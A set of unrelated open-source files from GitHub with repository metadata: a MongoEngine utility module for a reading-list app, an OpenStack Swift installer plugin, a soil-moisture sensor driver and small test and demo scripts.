account.Account._unregiter(cls.account)
def test_reload(self):
self.assertIsInstance(self.account.animes, account_animes.AccountAnimes)
self.assertIsInstance(self.account.mangas, account_mangas.AccountMangas)
self.assertIsInstance(self.account.friends, account_friends.AccountFriends)
def test_username(self):
self.assertEqual(self.account.username, ACCOUNT_TEST_USERNAME)
def main():
unittest.main()
if '__main__' == __name__:
main()
| {
"content_hash": "8a59940f486264fcfad0eb19d0099b1d",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 84,
"avg_line_length": 33.72289156626506,
"alnum_prop": 0.7034655234012147,
"repo_name": "pymal-developers/pymal",
"id": "5e11591c55e9c73684f8f3dab038fc33cee062e0",
"size": "2799",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_account.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "23557"
},
{
"name": "HTML",
"bytes": "251730"
},
{
"name": "JavaScript",
"bytes": "42595"
},
{
"name": "Python",
"bytes": "175513"
},
{
"name": "Shell",
"bytes": "58"
}
],
"symlink_target": ""
} |
from pyss.mpi.algorithm.linsolve import *
from pyss.mpi.algorithm.svd import *
| {
"content_hash": "9e132ae091fab086bb88b892cee5f102",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 41,
"avg_line_length": 39.5,
"alnum_prop": 0.7974683544303798,
"repo_name": "ibara1454/pyss",
"id": "b6ef76f7a919f08af5f6795eede5db6392128ee9",
"size": "126",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyss/mpi/algorithm/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "14795"
},
{
"name": "Python",
"bytes": "68840"
},
{
"name": "Shell",
"bytes": "1098"
}
],
"symlink_target": ""
} |
from copy import deepcopy
from bson.objectid import ObjectId
from flask_mongoengine import DoesNotExist
from mongoengine.queryset.visitor import Q
from pymongo import UpdateOne
from app.api.article.model import Article
from app.api.comment.model import Comment
from app.api.group.model import Group
from app.api.list.model import List
from app.api.user.model import User
from app.api.vote.model import Vote
from app.api.invitation.model import Invitation
from app.exception.UserHasVoted import UserHasVoted
def find_user(email):
# Find the existed user by email
try:
user = User.objects.get(email__exact=email)
except DoesNotExist:
# The user does not exist
return None
return user
def create_user(email, first_name, last_name):
# Create new user
new_user = User(email=email, first_name=first_name, last_name=last_name).save()
return new_user
def find_list(list_id):
try:
# Find reading list
user_list = List.objects.get(id=ObjectId(list_id))
except Exception as e:
return type(e).__name__
return user_list
def archive_list(user, list_id):
try:
# Get the list
archived_list = List.objects.get(id=ObjectId(list_id))
User.objects.get(id=user.id, lists=archived_list)
except DoesNotExist as e:
return None
# Mark it as archived
List.objects(id=archived_list.id).update_one(archived=True)
user.reload()
return user
def retrieve_list(user, list_id):
try:
retrieved_list = List.objects.get(id=ObjectId(list_id))
User.objects.get(id=user.id, lists=retrieved_list)
except DoesNotExist:
return None
# Mark it as not archived
List.objects(id=retrieved_list.id).update_one(archived=False)
user.reload()
return user
def bulk_retrieve_list(user, lists):
try:
bulk_list = List.objects.in_bulk([ObjectId(i) for i in lists]).values()
bulk_ops = list()
# URL: http://stackoverflow.com/questions/30943076/mongoengine-bulk-update-without-objects-update
# Author: lucasdavid
# Bulk update retrieve list
for each in bulk_list:
bulk_ops.append(UpdateOne({'_id': each.id}, {'$set': {'archived': False}}))
# Execute
collection = List._get_collection().bulk_write(bulk_ops, ordered=False)
except Exception as e:
return type(e).__name__
def archive_group_list(group_id, list_id):
try:
# Check if list exists
archived_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
group = Group.objects.get(id=ObjectId(group_id), lists=archived_list)
except DoesNotExist:
return None
List.objects(id=archived_list.id).update_one(archived=True)
return group
def retrieve_group_list(group_id, list_id):
try:
# Check if list exists
retrieved_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
group = Group.objects.get(id=ObjectId(group_id), lists=retrieved_list)
except DoesNotExist:
return None
List.objects(id=retrieved_list.id).update_one(archived=False)
return group
# def get_user_all_lists(user):
# # user = User.objects.get(id=user.id, lists__)
# pipeline = [
# {'$match': {'email': '[email protected]'}},
# {'$unwind': '$lists'},
# {'$lookup': {
# 'from': 'list',
# 'localField': 'lists',
# 'foreignField': '_id',
# 'as': 'listObj'
# }},
# {'$unwind': '$listObj'},
# {'$match': {'listObj.archived': {'$ne': 'true'}}},
# {'$group': {'_id': '$_id',
# 'email': {'$first': '$email'},
# 'last_name': {'$first': '$last_name'},
# 'first_name': {'$first': 'first_name'},
# 'lists': {'$push': '$lists'}}}
# ]
# pass
def create_list(list_name, user):
# Create new list
new_list = List(name=list_name).save()
# Append list reference to the user's lists list
User.objects(id=user.id).update_one(push__lists=new_list)
return new_list
def rename_personal_list(user, list_id, new_name):
try:
# Rename the list
the_list = List.objects.get(id=ObjectId(list_id))
List.objects(id=the_list.id).update_one(name=new_name)
except Exception as e:
return type(e).__name__
def create_article(user, data, list_id):
try:
# Check if list exists
List.objects.get(id=ObjectId(list_id))
# Create new article
new_article = Article(**data, creator=user).save()
except Exception as e:
return type(e).__name__
# Append article reference to the user's article lists
List.objects(id=list_id).update_one(push__articles=new_article)
return new_article
def update_article(data, article_id):
try:
# Check if the article exists
article = Article.objects.get(id=ObjectId(article_id))
# Update article
Article.objects(id=ObjectId(article_id)).update_one(**data)
except Exception as e:
return type(e).__name__
# Article.objects(id=ObjectId(article_id)).update_one(**data)
article.reload()
return article
def create_article_in_group(user, data, list_id, group_id):
try:
# Check if the list exist
the_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
the_group = Group.objects.get(Q(id=ObjectId(group_id)) & Q(lists=the_list))
# create new article
new_article = create_article(user, data, list_id)
# init the vote
Vote(article=new_article, list=the_list).save()
except Exception as e:
return type(e).__name__
return new_article
def find_article(article_id):
# Find the article
try:
article = Article.objects.get(id=ObjectId(article_id))
except DoesNotExist:
return None
return article
def add_article_to_list(list_id, article_id):
# Find the article
try:
article = find_article(article_id)
except DoesNotExist:
return None
# Find the list
try:
reading_list = find_list(list_id)
except DoesNotExist:
return None
# Add the article to the list
List.objects(id=ObjectId(list_id)).update_one(push__articles=article)
reading_list.reload()
return reading_list
def add_article_to_group_list(group_id, list_id, article_id):
# Find the article
try:
article = find_article(article_id)
reading_list = find_list(list_id)
# Add the article to the list
List.objects(id=ObjectId(list_id)).update_one(push__articles=article)
# Init the vote object
Vote(article=article, list=reading_list)
except Exception as e:
return type(e).__name__
reading_list.reload()
return reading_list
def add_tag(article_id, tag):
try:
article = Article.objects.get(id=ObjectId(article_id))
except DoesNotExist:
return None
# Add tag to article
Article.objects(id=article.id).update_one(push__tags=tag)
article.reload()
return article
def delete_article(user, list_id, article_id):
# Retrieve the articled and list to be deleted
try:
# Check resource
the_article = Article.objects.get(id=ObjectId(article_id))
the_list = List.objects.get(Q(id=ObjectId(list_id)) & Q(articles=the_article))
# Remove the article from the database
Article.objects(id=the_article.id).delete()
# Remove the vote as well
Vote.objects(article=the_article, list=the_list).delete()
except Exception as e:
return type(e).__name__
the_list.reload()
return the_list
def archive_article(user, list_id, article_id):
# Retrieve the articled and list to be deleted
try:
# Check resource
the_article = Article.objects.get(id=ObjectId(article_id))
the_list = List.objects.get(Q(id=ObjectId(list_id)) & Q(articles=the_article))
# Remove the article from the list
List.objects(id=the_list.id).update_one(pull__articles=the_article)
# Remove the vote as well
Vote.objects(article=the_article, list=the_list).delete()
except Exception as e:
return type(e).__name__
the_list.reload()
return the_list
def add_comment(user, article_id, comment, public=True):
try:
# Check if article exists
article = Article.objects.get(id=ObjectId(article_id))
# Post comment
new_comment = Comment(content=comment, public=public, author=user.email).save()
# Add reference to the article
Article.objects(id=article.id).update_one(push__comments=new_comment)
except Exception as e:
return type(e).__name__
return new_comment
def create_group(group_name, moderator, members=None, description=None):
# Create group
new_group = Group(name=group_name, moderator=moderator, description=description).save()
# Add moderator to members
Group.objects(id=new_group.id).update_one(push__members=moderator)
# Add members if not null
member_buffer = list()
if members:
for email in members:
try:
user = User.objects.get(email=email)
member_buffer.append(user)
except Exception as e:
return type(e).__name__
finally:
# Even if exception occurs, still be able to add a portion of user
Group.objects(id=new_group.id).update_one(add_to_set__members=member_buffer)
# Bulk update
Group.objects(id=new_group.id).update_one(add_to_set__members=member_buffer)
new_group.reload()
return new_group
def find_group(group_id):
try:
# Find group
reading_group = Group.objects.get(id=ObjectId(group_id))
except DoesNotExist:
return None
return reading_group
def add_group_member(group_id, member_email):
try:
# Find the group and user
reading_group = find_group(group_id)
new_member = User.objects.get(email=member_email)
# Add user to group
Group.objects(id=ObjectId(group_id)).update_one(push__members=new_member)
except Exception as e:
return type(e).__name__
# Add group member
reading_group.reload()
return reading_group
def create_group_list(user, list_name, group_id):
# Check if user has permission
# Create list
new_list = List(name=list_name).save()
# Append list reference to the group's list of lists
try:
Group.objects(id=ObjectId(group_id)).update_one(push__lists=new_list)
except DoesNotExist:
return None
return new_list
def get_user_groups(user):
groups = Group.objects(members=user)
if Group.objects(members=user).count() == 0:
return None
return groups
def get_group_lists(user, group_id):
try:
# Get group
group = Group.objects.get(id=ObjectId(group_id), members=user)
except DoesNotExist:
return None
return group
def check_user_in_group(user, group_id):
try:
# Check if user belongs to the group
Group.objects.get(id=ObjectId(group_id), members=user)
except DoesNotExist:
return None
return 0
def share_list_to_group(user, list_id, group_id):
try:
for group in group_id:
duplicate_list = deepcopy(List.objects.get(id=ObjectId(list_id)))
duplicate_list.id = None
duplicate_list.save()
# init the vote for each articles
init_vote(duplicate_list)
target_group = Group.objects.get(id=ObjectId(group))
Group.objects(id=target_group.id).update_one(push__lists=duplicate_list)
except Exception as e:
return type(e).__name__
def init_vote(the_list):
for article in the_list.articles:
Vote(article=article, list=the_list).save()
def check_vote_exist(list, article):
try:
# Try to retrieve the vote
vote = Vote.objects.get(list=list, article=article)
except DoesNotExist:
# If it does not exist, create a new one instead
vote = Vote(list=list, article=article).save()
return vote
def check_user_has_upvoted(user, vote):
try:
# Check if user has upvoted or not
Vote.objects.get(Q(id=vote.id) & Q(upvoter_list=user))
except DoesNotExist:
# User have not upvote
return False
return True
def check_user_has_downvoted(user, vote):
try:
# Check if user has downvoted or not
vote = Vote.objects.get(Q(id=vote.id) & Q(downvoter_list=user))
except DoesNotExist:
# User have not downvote
return False
return True
def upvote_article(user, group_id, list_id, article_id):
try:
# Resources check
article = Article.objects.get(id=ObjectId(article_id))
group = Group.objects.get(id=ObjectId(group_id), lists=ObjectId(list_id), members=user)
list = List.objects.get(id=ObjectId(list_id), articles=article)
# Create new vote
vote = check_vote_exist(list, article)
if check_user_has_upvoted(user, vote):
raise UserHasVoted('User cannot vote twice.')
# Revoke vote
if check_user_has_downvoted(user, vote):
Vote.objects(id=vote.id).update_one(pull__downvoter_list=user, vote_count=vote.vote_count + 1)
else:
# Upvote article
Vote.objects(id=vote.id).update_one(push__upvoter_list=user, vote_count=vote.vote_count+1)
except Exception as e:
return type(e).__name__
vote.reload()
return vote
def downvote_article(user, group_id, list_id, article_id):
try:
# Resources check
article = Article.objects.get(id=ObjectId(article_id))
group = Group.objects.get(id=ObjectId(group_id), lists=ObjectId(list_id), members=user)
list = List.objects.get(id=ObjectId(list_id), articles=article)
# Create new vote
vote = check_vote_exist(list, article)
if check_user_has_downvoted(user, vote):
raise UserHasVoted('User cannot vote twice.')
# User is just trying to take vote back
if check_user_has_upvoted(user, vote):
Vote.objects(id=vote.id).update_one(pull__upvoter_list=user, vote_count=vote.vote_count-1)
else:
# Downvote
Vote.objects(id=vote.id).update_one(push__downvoter_list=user, vote_count=vote.vote_count-1)
except Exception as e:
return type(e).__name__
vote.reload()
return vote
def get_vote_count(list_id, article_id):
try:
list = List.objects.get(id=ObjectId(list_id))
article = Article.objects.get(id=ObjectId(article_id))
vote = Vote.objects.get(Q(list=list) & Q(article=article))
except Exception as e:
return type(e).__name__
return vote.vote_count
def add_vote_count(group_list):
for i, article in enumerate(group_list['articles']):
group_list['articles'][i]['vote_count'] = get_vote_count(group_list['id'], article['id'])
return group_list
def partition_user_list(user, old_list_id, new_list_name, articles):
try:
# Get list and create new list
old_list = List.objects.get(id=ObjectId(old_list_id))
new_list = create_list(new_list_name, user)
article_buffer = list()
for a in articles:
article_buffer.append(Article.objects.get(id=ObjectId(a)))
# Add selected article into new list and remove from old list
List.objects(id=new_list.id).update_one(add_to_set__articles=article_buffer)
List.objects(id=old_list.id).update_one(pull_all__articles=article_buffer)
except Exception as e:
print(type(e).__name__)
return type(e).__name__
old_list.reload()
new_list.reload()
return old_list, new_list
def copy_article_to_user_list(user, base_list_id, article_id, target_list_id):
try:
# Get article and lists
article = Article.objects.get(id=ObjectId(article_id))
list1 = List.objects.get(Q(id=ObjectId(base_list_id)) & Q(articles=article))
list2 = List.objects.get(id=ObjectId(target_list_id))
Vote(article=article, list=list2).save()
# Update articles list
List.objects(id=list2.id).update_one(push__articles=article)
except Exception as e:
return type(e).__name__
def merge_user_ist(user, base_list_id, target_list_id):
try:
base_list = List.objects.get(id=ObjectId(base_list_id))
target_list = List.objects.get(id=ObjectId(target_list_id))
List.objects(id=target_list.id).update_one(add_to_set__articles=base_list.articles)
List.objects(id=base_list.id).delete()
except Exception as e:
return type(e).__name__
def invite_user(inviter, invitees_email, group_id):
try:
# Create new invitation object
group = Group.objects.get(id=ObjectId(group_id))
invitations = list()
for invitee_email in invitees_email:
if invitee_email != inviter.email:
invitee = User.objects.get(email=invitee_email)
invitations.append(Invitation(invitee=invitee, inviter=inviter, group=group).save())
except Exception as e:
return type(e).__name__
return invitations
def get_user_pending_invitation(user):
try:
# Retrive all user pending invitaiton
pending_invitations = Invitation.objects(invitee=user)
except Exception as e:
return type(e).__name__
return pending_invitations
def accept_invitation(user, invitation_id):
try:
# Accept invitation
invitation = Invitation.objects.get(id=ObjectId(invitation_id))
if user != invitation.invitee:
raise ValueError
Group.objects(id=invitation.group.id).update_one(push__members=user)
Invitation.objects(id=invitation.id).delete()
except Exception as e:
return type(e).__name__
return invitation
def deny_invitation(user, invitation_id):
try:
# Accept invitation
invitation = Invitation.objects.get(id=ObjectId(invitation_id))
if user != invitation.invitee:
raise ValueError
Invitation.objects(id=invitation.id).delete()
except Exception as e:
return type(e).__name__
return invitation
def share_article_to_group_list(user, base_list_id, article_id, group_id, target_list_id):
try:
# Check ownership
base_list = List.objects.get(id=ObjectId(base_list_id))
target_list = List.objects.get(id=ObjectId(target_list_id))
article = Article.objects.get(id=ObjectId(article_id))
Group.objects.get(Q(id=ObjectId(group_id)) & Q(lists=target_list))
User.objects.get(Q(id=user.id) & Q(lists=base_list))
# Add article ito the list
List.objects(id=target_list.id).update_one(push__articles=article)
# Init the vote object as well
Vote(article=article, list=target_list).save()
except Exception as e:
return type(e).__name__
| {
"content_hash": "baa5c4238e904e38ee565528ba2ff0c4",
"timestamp": "",
"source": "github",
"line_count": 650,
"max_line_length": 106,
"avg_line_length": 29.736923076923077,
"alnum_prop": 0.6319519892389673,
"repo_name": "TeamGhostBuster/restful-api",
"id": "cb01ff6a2d4f3d75c7739b91ef9d1217611d150b",
"size": "19329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/util/MongoUtil.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "520"
},
{
"name": "Python",
"bytes": "101060"
}
],
"symlink_target": ""
} |
"""
Installs and configures an OpenStack Swift
"""
import uuid
import logging
import os
from packstack.installer import validators
from packstack.installer import basedefs
import packstack.installer.common_utils as utils
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile, manifestfiles
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-SWIFT"
PLUGIN_NAME_COLORED = utils.getColoredText(PLUGIN_NAME, basedefs.BLUE)
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Swift configuration")
paramsList = [
{"CMD_OPTION" : "os-swift-proxy",
"USAGE" : "The IP address on which to install the Swift proxy service",
"PROMPT" : "Enter the IP address of the Swift proxy service",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ip, validators.validate_ssh],
"DEFAULT_VALUE" : utils.getLocalhostIP(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_PROXY_HOSTS", #XXX: Shouldn't be here CONFIG_SWIFT_PROXY_HOST?
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-ks-passwd",
"USAGE" : "The password to use for the Swift to authenticate with Keystone",
"PROMPT" : "Enter the password for the Swift Keystone access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SWIFT_KS_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage",
"USAGE" : "A comma separated list of IP addresses on which to install the Swift Storage services, each entry should take the format <ipaddress>[/dev], for example 127.0.0.1/vdb will install /dev/vdb on 127.0.0.1 as a swift storage device(packstack does not create the filesystem, you must do this first), if /dev is omitted Packstack will create a loopback device for a test setup",
"PROMPT" : "Enter the Swift Storage servers e.g. host/dev,host/dev",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty, validate_storage],
"DEFAULT_VALUE" : utils.getLocalhostIP(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-zones",
"USAGE" : "Number of swift storage zones, this number MUST be no bigger than the number of storage devices configured",
"PROMPT" : "Enter the number of swift storage zones, MUST be no bigger than the number of storage devices configured",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_integer],
"DEFAULT_VALUE" : "1",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_ZONES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-replicas",
"USAGE" : "Number of swift storage replicas, this number MUST be no bigger than the number of storage zones configured",
"PROMPT" : "Enter the number of swift storage replicas, MUST be no bigger than the number of storage zones configured",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_integer],
"DEFAULT_VALUE" : "1",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_REPLICAS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-fstype",
"USAGE" : "FileSystem type for storage nodes",
"PROMPT" : "Enter FileSystem type for storage nodes",
"OPTION_LIST" : ['xfs','ext4'],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "ext4",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_FSTYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "OSSWIFT",
"DESCRIPTION" : "OpenStack Swift Config parameters",
"PRE_CONDITION" : "CONFIG_SWIFT_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
def validate_storage(param, options=None):
for host in param.split(','):
host = host.split('/', 1)[0]
validators.validate_ip(host.strip(), options)
def initSequences(controller):
if controller.CONF['CONFIG_SWIFT_INSTALL'] != 'y':
return
steps = [
{'title': 'Adding Swift Keystone manifest entries', 'functions':[createkeystonemanifest]},
{'title': 'Adding Swift builder manifest entries', 'functions':[createbuildermanifest]},
{'title': 'Adding Swift proxy manifest entries', 'functions':[createproxymanifest]},
{'title': 'Adding Swift storage manifest entries', 'functions':[createstoragemanifest]},
{'title': 'Adding Swift common manifest entries', 'functions':[createcommonmanifest]},
]
controller.addSequence("Installing OpenStack Swift", [], [], steps)
def createkeystonemanifest():
manifestfile = "%s_keystone.pp"%controller.CONF['CONFIG_KEYSTONE_HOST']
controller.CONF['CONFIG_SWIFT_PROXY'] = controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'].split(',')[0]
manifestdata = getManifestTemplate("keystone_swift.pp")
appendManifestFile(manifestfile, manifestdata)
devices = []
def parse_devices(config_swift_storage_hosts):
"""
Returns dict containing information about Swift storage devices.
"""
device_number = 0
num_zones = int(controller.CONF["CONFIG_SWIFT_STORAGE_ZONES"])
for host in config_swift_storage_hosts.split(","):
host = host.strip()
device_number += 1
device = None
if '/' in host:
host, device = map(lambda x: x.strip(), host.split('/', 1))
zone = str((device_number % num_zones) + 1)
devices.append({'host': host, 'device': device, 'zone': zone,
'device_name': 'device%s' % device_number})
return devices
# The ring file should be built and distributed befor the storage services
# come up. Specifically the replicator crashes if the ring isn't present
def createbuildermanifest():
# TODO : put this on the proxy server, will need to change this later
controller.CONF['CONFIG_SWIFT_BUILDER_HOST'] = controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'].split(',')[0]
manifestfile = "%s_ring_swift.pp"%controller.CONF['CONFIG_SWIFT_BUILDER_HOST']
manifestdata = getManifestTemplate("swift_builder.pp")
# Add each device to the ring
devicename = 0
for device in parse_devices(controller.CONF["CONFIG_SWIFT_STORAGE_HOSTS"]):
host = device['host']
devicename = device['device_name']
zone = device['zone']
manifestdata = manifestdata + '\n@@ring_object_device { "%s:6000/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
manifestdata = manifestdata + '\n@@ring_container_device { "%s:6001/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
manifestdata = manifestdata + '\n@@ring_account_device { "%s:6002/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
appendManifestFile(manifestfile, manifestdata, 'swiftbuilder')
def createproxymanifest():
manifestfile = "%s_swift.pp"%controller.CONF['CONFIG_SWIFT_PROXY_HOSTS']
manifestdata = getManifestTemplate("swift_proxy.pp")
# If the proxy server is also a storage server then swift::ringsync will be included for the storage server
if controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'] not in [h['host'] for h in devices]:
manifestdata += 'swift::ringsync{["account","container","object"]:\n ring_server => "%s"\n}'%controller.CONF['CONFIG_SWIFT_BUILDER_HOST']
appendManifestFile(manifestfile, manifestdata)
def check_device(host, device):
"""
Raises ScriptRuntimeError if given device is not mounted on given
host.
"""
server = utils.ScriptRunner(host)
# the device MUST exist
cmd = 'ls -l /dev/%s'
server.append(cmd % device)
# if it is not mounted then we can use it
cmd = 'grep "/dev/%s " /proc/self/mounts || exit 0'
server.append(cmd % device)
# if it is mounted then the mount point has to be in /srv/node
cmd = 'grep "/dev/%s /srv/node" /proc/self/mounts && exit 0'
server.append(cmd % device)
# if we got here without exiting then we can't use this device
server.append('exit 1')
server.execute()
return False
def createstoragemanifest():
# this need to happen once per storage host
for host in set([device['host'] for device in devices]):
controller.CONF["CONFIG_SWIFT_STORAGE_CURRENT"] = host
manifestfile = "%s_swift.pp"%host
manifestdata = getManifestTemplate("swift_storage.pp")
appendManifestFile(manifestfile, manifestdata)
# this need to happen once per storage device
for device in devices:
host = device['host']
devicename = device['device_name']
device = device['device']
if device:
check_device(host, device)
manifestfile = "%s_swift.pp"%host
if device:
manifestdata = "\n" + 'swift::storage::%s{"%s":\n device => "/dev/%s",\n}'% (controller.CONF["CONFIG_SWIFT_STORAGE_FSTYPE"], devicename, device)
else:
controller.CONF["SWIFT_STORAGE_DEVICES"] = "'%s'"%devicename
manifestdata = "\n" + getManifestTemplate("swift_loopback.pp")
appendManifestFile(manifestfile, manifestdata)
def createcommonmanifest():
for manifestfile, marker in manifestfiles.getFiles():
if manifestfile.endswith("_swift.pp"):
data = getManifestTemplate("swift_common.pp")
appendManifestFile(os.path.split(manifestfile)[1], data)
| {
"content_hash": "d966e914d756b97655725e3ab7e9e38a",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 411,
"avg_line_length": 47.94285714285714,
"alnum_prop": 0.5720245189851865,
"repo_name": "skottler/packstack",
"id": "e06a02ffbb42e9cc480db69ef9d9b3dcb11bf62e",
"size": "11746",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "packstack/plugins/swift_600.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
from common.adafruit.Adafruit_ADS1x15 import Adafruit_ADS1x15
# from threading import RLock # May be needed if we end up multiplexing readings with a 16:1 analog mux
class VH400MoistureSensor(object):
"""
This class supports the Vegetronix VH400 MoistureSensor
"""
ADS1115 = 0x01
def __init__(self, i2c_addr=0x49, pin=None, gain=4096, sps=256, readings_to_average=1):
"""
A Vegetronix VH400 MoistureSensor.
Some notes from https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code/blob/master/Adafruit_ADS1x15/ads1x15_ex_singleended.py
Select the gain
gain = 6144 # +/- 6.144V
gain = 4096 # +/- 4.096V
gain = 2048 # +/- 2.048V
gain = 1024 # +/- 1.024V
gain = 512 # +/- 0.512V
gain = 256 # +/- 0.256V
Select the sample rate
sps = 8 # 8 samples per second
sps = 16 # 16 samples per second
sps = 32 # 32 samples per second
sps = 64 # 64 samples per second
sps = 128 # 128 samples per second
sps = 250 # 250 samples per second
sps = 475 # 475 samples per second
sps = 860 # 860 samples per second
Possible ADS1x15 i2c address: 0x48, 0x48, 0x4a, 0x4b
Our default is 0x49 This will probably be hard-coded on the board.
ADS1015 = 0x00 # 12-bit ADC
ADS1115 = 0x01 # 16-bit ADC
:param i2c_addr: i2c address of the ADS1115 chip
:type i2c_addr: hex
:param pin: Which ADC do we read when talking to this sensor?
:type pin: int
:param gain: Input gain. This shouldn't be changed from 4096 as the VH400 has a 0-3v output
:type gain: int
:param sps: How many samples per second will the ADC take? Lower = less noise, Higher = faster readings.
:type sps: int
:param readings_to_average: How many readings to we average before returning a value
:type readings_to_average: int
"""
self._i2c_addr = i2c_addr
self._pin = pin
self._gain = gain
self._sps = sps
self._adc = Adafruit_ADS1x15.ADS1x15(address=self._i2c_addr, ic=self.ADS1115)
self.readings_to_average = readings_to_average
@property
def percent(self):
"""
Return the Volumetric Water Content (VWC) % of the soil
VH400 Piecewise Curve:
Most curves can be approximated with linear segments of the form:
y= m*x-b,
where m is the slope of the line
The VH400's Voltage to VWC curve can be approximated with 4 segments of the form:
VWC= m*V-b
where V is voltage.
m= (VWC2 - VWC1)/(V2-V1)
where V1 and V2 are voltages recorded at the respective VWC levels of VWC1 and VWC2.
After m is determined, the y-axis intercept coefficient b can be found by inserting one of the end points into the equation:
b= m*v-VWC
Voltage Range Equation
0 to 1.1V VWC= 10*V-1
1.1V to 1.3V VWC= 25*V- 17.5
1.3V to 1.82V VWC= 48.08*V- 47.5
1.82V to 2.2V VWC= 26.32*V- 7.89
:return: float
"""
v = self.raw_voltage
res = 0
if 0.0 <= v <= 1.1:
res = 10 * v - 1
elif 1.1 < v <= 1.3:
res = 25 * v - 17.5
elif 1.3 < v <= 1.82:
res = 48.08 * v - 47.5
elif 1.82 < v:
res = 26.32 * v - 7.89
if res < 0:
return 0
else:
return res * 1.5 # Scale result to 100% when entire green stick is submerged in water
@property
def raw_voltage(self):
"""
Return the raw sensor voltage. Average readings before returning the value
:return: float
"""
reading = 0.0
for _i in range(self.readings_to_average):
reading += self._adc.readADCSingleEnded(self._pin, self._gain, self._sps)
return reading / self.readings_to_average / 1000.0
if __name__ == "__main__":
sensor0 = VH400MoistureSensor(pin=0)
print("Raw voltage: %s" % sensor0.raw_voltage)
print("Percent: %s" % sensor0.percent)
| {
"content_hash": "c73da1247ed7a89dae3282a52d6272ab",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 140,
"avg_line_length": 34.3968253968254,
"alnum_prop": 0.5592985694508538,
"repo_name": "mecworks/garden_pi",
"id": "e5da6ca424400a1b6cb33f2a5d4463e82fce6fcf",
"size": "4357",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "common/moisture_sensor.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "15566"
},
{
"name": "C++",
"bytes": "10994"
},
{
"name": "Makefile",
"bytes": "326"
},
{
"name": "Python",
"bytes": "130724"
},
{
"name": "Shell",
"bytes": "1867"
}
],
"symlink_target": ""
} |
from xudd.lib.server import Server
from xudd.lib.http import HTTP
from xudd.lib.wsgi import WSGI
from xudd.hive import Hive
import logging
def wsgi_app(environ, start_response):
response = start_response(200, {'Content-Type': 'text/plain'}.items())
response('Hello World!')
def serve():
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('xudd.hive').setLevel(logging.INFO)
logging.getLogger('xudd.actor').setLevel(logging.INFO)
hive = Hive()
wsgi_id = hive.create_actor(WSGI, app=wsgi_app)
http_id = hive.create_actor(HTTP, request_handler=wsgi_id)
server_id = hive.create_actor(Server, request_handler=http_id)
hive.send_message(
to=server_id,
directive='listen')
hive.run()
if __name__ == '__main__':
serve()
| {
"content_hash": "f6e6a7c6b739feb60473d6c64ab02b47",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 74,
"avg_line_length": 24.09090909090909,
"alnum_prop": 0.6792452830188679,
"repo_name": "xudd/xudd",
"id": "0f27fb94889bb9cab7b98e1c7a1e0112574d06a4",
"size": "795",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xudd/demos/lib-server.py",
